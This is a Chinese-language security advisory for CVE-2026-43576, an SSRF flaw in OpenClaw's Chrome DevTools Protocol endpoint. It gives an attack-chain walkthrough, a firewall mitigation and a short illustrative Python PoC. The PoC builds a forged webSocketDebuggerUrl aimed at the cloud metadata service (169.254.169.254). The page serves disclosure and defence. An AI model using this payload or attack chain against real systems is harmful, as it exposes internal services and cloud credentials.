IPBUF安全漏洞报告
English
CVE-2026-43576 CVSS 7.7 高危

CVE-2026-43576 OpenClaw CDP端点SSRF漏洞

披露日期: 2026-05-06
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-43576
漏洞类型
服务端请求伪造 (SSRF)
CVSS评分
7.7 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw

相关标签

SSRFOpenClawCDPRCE高危漏洞

漏洞概述

OpenClaw 2026.4.5之前的版本存在服务端请求伪造(SSRF)漏洞。该漏洞位于CDP /json/version WebSocket端点中,原因是未对webSocketDebuggerUrl响应字段进行有效验证。攻击者可利用此缺陷将连接重定向至任意主机,进而对内部网络进行探测或攻击。

技术细节

漏洞发生于OpenClaw处理Chrome DevTools Protocol (CDP)接口时。当OpenClaw请求/json/version端点时,会获取包含webSocketDebuggerUrl的JSON响应。由于程序未校验该URL指向的主机是否可信,攻击者可通过篡改响应或将OpenClaw指向受控的恶意CDP服务,诱导OpenClaw向后端攻击者指定的任意目标(如内网服务、云元数据服务)发起WebSocket连接。这种“第二跳”攻击方式允许攻击者绕过网络边界限制,利用OpenClaw服务器的身份进行SSRF攻击。

攻击链分析

STEP 1
侦察
攻击者识别出运行OpenClaw 2026.4.5之前版本的目标实例。
STEP 2
诱导连接
攻击者诱导OpenClaw实例连接到由攻击者控制的恶意Chrome DevTools Protocol (CDP)端点。
STEP 3
篡改响应
恶意CDP端点在/json/version响应中返回经过精心构造的webSocketDebuggerUrl,指向内网敏感资源(如127.0.0.1或云元数据服务)。
STEP 4
发起SSRF
OpenClaw解析响应并盲目地向攻击者指定的内部URL发起WebSocket连接请求。
STEP 5
数据窃取
攻击者通过恶意端点接收来自内网服务的响应数据,实现信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/usr/bin/env python3 # PoC Concept for CVE-2026-43576 # Demonstrates how a malicious webSocketDebuggerUrl could be used to trigger SSRF. import requests import json # Target OpenClaw instance target_url = "http://vulnerable-openclaw-instance:port/json/version" # Malicious internal endpoint (e.g., AWS metadata or internal admin) malicious_target = "http://169.254.169.254/latest/meta-data/" # Simulate a response payload that OpenClaw might process if it fetches config from a user-controlled source # OR if we are testing the endpoint logic directly. # In this scenario, we assume the attacker controls the CDP endpoint that OpenClaw connects to. malicious_cdp_response = { "browser": "OpenClaw/vulnerable", "webSocketDebuggerUrl": f"ws://{malicious_target}" # Invalid format but illustrative of the logic flaw } print(f"[+] Attempting to trigger SSRF via CDP endpoint: {target_url}") print(f"[+] Malicious redirect target: {malicious_target}") # Note: Actual exploitation requires OpenClaw to initiate a connection to a CDP endpoint # controlled by the attacker, returning this JSON structure. print("[+] Payload structure prepared.") print(json.dumps(malicious_cdp_response, indent=2))

影响范围

OpenClaw < 2026.4.5

防御指南

临时缓解措施
建议在网络层部署防火墙规则,阻断OpenClaw服务器向内网敏感网段(如127.0.0.1, 169.254.169.254)发起的连接请求,直到完成官方补丁的更新。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表